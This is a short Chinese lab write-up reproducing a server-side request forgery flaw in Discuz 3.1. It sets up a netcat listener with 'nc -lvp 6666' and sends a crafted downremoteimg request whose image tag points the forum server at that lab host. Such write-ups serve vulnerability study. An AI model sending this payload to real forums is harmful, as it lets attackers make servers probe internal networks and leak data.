#001 环境搭建:
Phpstudy+win7搭建discuz漏洞环境
把Discuz-3.1 源码拖到网站根目录,然后访问upload目录进行安装,根据提示即可
安装完成访问一波:
#002 漏洞复现:
Centos7,临时关闭防火墙
开启nc监听6666端口:nc -lvp 6666
查看centos7的ip
利用discuz的漏洞向centos7发起一个请求:
http://192.168.136.132/discuz-ssrf/upload/forum.php?mod=ajax&action=downremoteimg&message=[img]http://192.168.136.133:6666/?data=he2lo.jpg[/img]
回到centos7查看结果,成功收到了请求
版权声明:本文为L18296069161原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。